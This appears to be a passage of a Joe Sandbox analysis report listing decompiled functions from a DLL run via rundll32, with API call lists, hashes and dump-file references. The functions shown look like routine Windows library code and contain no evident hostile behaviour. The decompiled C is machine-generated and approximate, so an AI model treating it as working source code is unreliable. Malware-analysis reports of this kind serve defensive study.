								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E10013400(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E10013400( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E10013400( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018F3F( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E1001974B(_t150, _t169);
								_t109 =  *0x10037b68; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E10013747(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x10037b70; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E10013747(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}

APIs

__allrem.LIBCMT ref: 100135A2
__allrem.LIBCMT ref: 100135BA
__allrem.LIBCMT ref: 100135D6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013611
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001362D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013644

Part of subcall function 1001974B: __lock.LIBCMT ref: 10019763

Strings

E, xrefs: 10013568

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
String ID: E
API String ID: 4106114094-3568589458
Opcode ID: 0a611df709a13b512d76e6ce74004cc72a69620633ca5c9709cb14a32ee90e18
Instruction ID: d223622ab2a34d536ca179d9b108071d2b4ae26b01bf850aeccba7f7437b6f17
Opcode Fuzzy Hash: 0a611df709a13b512d76e6ce74004cc72a69620633ca5c9709cb14a32ee90e18
Instruction Fuzzy Hash: 63717DB5E00619AFEB59CFA8CC81B9EB7B6FB44714F14C169F510EB281D774EA808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC6B Relevance: 12.3, APIs: 8, Instructions: 303
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000BC6B(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011A8C(E1002ABDA, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A68E(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x1002fad8, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A894(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x1002fba8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x1002fc28, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								E10025803(_t228 - 0x74, _t214);
								 *(_t228 - 4) = 0;
								E1001D864(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E100257BE(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x1002fc38);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}

APIs

__EH_prolog.LIBCMT ref: 1000BC70

Part of subcall function 1000A68E: CoGetClassObject.OLE32(?,?,00000000,1002FB78,?), ref: 1000A6AE

Part of subcall function 10025803: __EH_prolog.LIBCMT ref: 10025808

Part of subcall function 100257BE: __EH_prolog.LIBCMT ref: 100257C3

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BDF9
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BE1A
GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BE6D
GlobalLock.KERNEL32 ref: 1000BE7B
GlobalUnlock.KERNEL32(?), ref: 1000BE93
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BEB6
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BED2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 76f195cb7df75b09fefa107cbb8d515ebf8efbf6e38d7119c82f429092a27cfa
Instruction ID: 81fc4a865cc177b0a24fd02293c021347662990eff55a4ea9121e9fb8e92f515
Opcode Fuzzy Hash: 76f195cb7df75b09fefa107cbb8d515ebf8efbf6e38d7119c82f429092a27cfa
Instruction Fuzzy Hash: 9FC12870A0064AEFDB10DF64C888EAEBBB9FF88780B20455AF911EB255D771D941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 100259DB Relevance: 12.1, APIs: 8, Instructions: 134
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100259DB(void* __ebx, void* __ecx, void* __edi) {
				int _t24;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				struct HWND__* _t32;
				long _t33;
				struct HWND__* _t34;
				void* _t35;
				struct HWND__* _t36;
				struct HWND__* _t37;
				void* _t39;
				void* _t42;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t55;
				struct HWND__* _t56;
				struct HWND__* _t58;
				struct HWND__* _t59;
				void* _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr _t63;
				void* _t67;
				void* _t70;

				_t55 = __edi;
				_t42 = __ebx;
				E10011A8C(E1002AEA0, _t67);
				_push(__ecx);
				_push(__ecx);
				_t47 = E1001F51F(0x10);
				 *((intOrPtr*)(_t67 - 0x14)) = _t47;
				_t24 = 0;
				 *(_t67 - 4) = 0;
				if(_t47 != 0) {
					_push( *((intOrPtr*)(_t67 + 0xc)));
					_push( *((intOrPtr*)(_t67 + 8)));
					_t24 = E100107F0(_t47);
				}
				 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t67 - 0x10)) = _t24;
				E100125AC(_t67 - 0x10, 0x100334e4);
				asm("int3");
				_t27 =  *((intOrPtr*)(_t47 + 0x74));
				if(_t27 == 0) {
					_t61 = E10006E47();
					_t30 =  *((intOrPtr*)( *_t61 + 0x120))();
					_t49 = _t61;
					_t62 = _t60;
					if(_t30 != 0) {
						_push(_t62);
						_t63 = _t49;
						_t31 =  *((intOrPtr*)(_t63 + 0x60));
						if(_t31 == 0) {
							_t49 = _t63;
							_pop(_t62);
							goto L9;
						} else {
							if(_t31 != 0x3f107) {
								_t39 = E10027747();
								_t31 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xac))( *((intOrPtr*)(_t63 + 0x60)), 1);
							}
							return _t31;
						}
					} else {
						L9:
						_push(_t49);
						_push(_t42);
						_push(_t67);
						_push(_t62);
						_push(_t55);
						 *((intOrPtr*)(_t70 + 0x10)) = _t49;
						_t32 = GetCapture();
						while(1) {
							_t56 = _t32;
							if(_t56 == 0) {
								break;
							}
							_t33 = SendMessageA(_t56, 0x365, 0, 0);
							if(_t33 == 0) {
								_t32 = E10021709(_t56);
								continue;
							}
							L25:
							return _t33;
							goto L31;
						}
						_t34 = GetFocus();
						while(1) {
							_t58 = _t34;
							if(_t58 == 0) {
								break;
							}
							_t33 = SendMessageA(_t58, 0x365, 0, 0);
							if(_t33 == 0) {
								_t34 = E10021709(_t58);
								continue;
							}
							goto L25;
						}
						_t35 = E1002174E( *((intOrPtr*)(_t70 + 0x10)));
						if(_t35 != 0) {
							_t36 =  *(_t35 + 0x1c);
						} else {
							_t36 = 0;
						}
						_t37 = GetLastActivePopup(_t36);
						while(1) {
							_t59 = _t37;
							_push(0);
							if(_t59 == 0) {
								break;
							}
							_t33 = SendMessageA(_t59, 0x365, 0, ??);
							if(_t33 == 0) {
								_t37 = E10021709(_t59);
								continue;
							}
							goto L25;
						}
						_t33 = SendMessageA( *( *((intOrPtr*)(_t70 + 0x14)) + 0x1c), 0x111, 0xe147, ??);
						goto L25;
					}
				} else {
					if(_t27 != 0x3f107) {
						return  *((intOrPtr*)( *_t47 + 0xac))(_t27, 1);
					}
					return _t27;
				}
				L31:
			}

APIs

__EH_prolog.LIBCMT ref: 100259E0

Part of subcall function 100107F0: __EH_prolog.LIBCMT ref: 100107F5

GetCapture.USER32 ref: 10025F9F
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10025FB8
GetFocus.USER32(00000000,?,?,?,?,00000000,?,100334E4,?,?,10025445,00000004,?), ref: 10025FCA
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10025FD6
GetLastActivePopup.USER32(?), ref: 10025FFD
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10026008
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 1002602C

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
String ID:
API String ID: 2915395904-0
Opcode ID: 1868756b389529cf4455c842ec3834e36438baf64b94a4db3f3281535856cf44
Instruction ID: 783682ae1fd40623ef9dff1ae9101b1b5bed8c2e41133a072ea1f97791c34749
Opcode Fuzzy Hash: 1868756b389529cf4455c842ec3834e36438baf64b94a4db3f3281535856cf44
Instruction Fuzzy Hash: A641157470421AAFDB14DB74EC84EAF7AEDEF48391B620539F402C7251DB32EC0196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1001E009 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001E009(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E100252E7(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100252E7( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 1001E026
lstrcmpA.KERNEL32(?,?), ref: 1001E032
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001E044
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001E064
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001E06C
GlobalLock.KERNEL32 ref: 1001E076
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001E083
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001E09B

Part of subcall function 100252E7: GlobalFlags.KERNEL32(?), ref: 100252F1
Part of subcall function 100252E7: GlobalUnlock.KERNEL32(?,00000000,?,1001E095,?,00000000,?,?,00000000,00000000,00000002), ref: 10025302
Part of subcall function 100252E7: GlobalFree.KERNEL32 ref: 1002530D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 7b65abf6cc078237bdb933646263222204c9ae660642787b7cdfb4e9b32591aa
Instruction ID: 124cf2e802cae396f4c25565f6d404f7a9a181274e496d944d42d89b83b21ff8
Opcode Fuzzy Hash: 7b65abf6cc078237bdb933646263222204c9ae660642787b7cdfb4e9b32591aa
Instruction Fuzzy Hash: C7119A76500648BEDB229BA6DC86D6F7BFCEB89740B104829F646DA111C672ED80DB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002330D Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002330D(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1003a090 = GetSystemMetrics(2) + 1;
				 *0x1003a094 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x10023318
0x1002331e
0x10023325
0x1002332d
0x10023337
0x10023348
0x10023352
0x1002335a
0x10023366

APIs

GetSystemMetrics.USER32 ref: 1002331A
GetSystemMetrics.USER32 ref: 10023321
GetSystemMetrics.USER32 ref: 10023328
GetSystemMetrics.USER32 ref: 10023332
GetDC.USER32(00000000), ref: 1002333C
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002334D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10023355
ReleaseDC.USER32 ref: 1002335D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 866c45511ebbb025b3f3c174f79a81cecd09e788949084d9183ae73f2f2ad9cd
Instruction ID: c891c8e5a89503d55a866ebaabe51936f11af8778d7582ac80da58173786c339
Opcode Fuzzy Hash: 866c45511ebbb025b3f3c174f79a81cecd09e788949084d9183ae73f2f2ad9cd
Instruction Fuzzy Hash: A6F03671A407146EF7216F718CCAF277BB4EB81711F114419E7418B1D1D7B598028F50

Uniqueness

Uniqueness Score: -1.00%

Function 10007B3E Relevance: 10.7, APIs: 7, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10007B3E(void* __esi) {
				void* __ebx;
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011A8C(E1002A892, _t239);
				_t132 =  *0x100371f4; // 0x82d1d2ba
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E1002320B();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F51F(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B641(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10007060(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
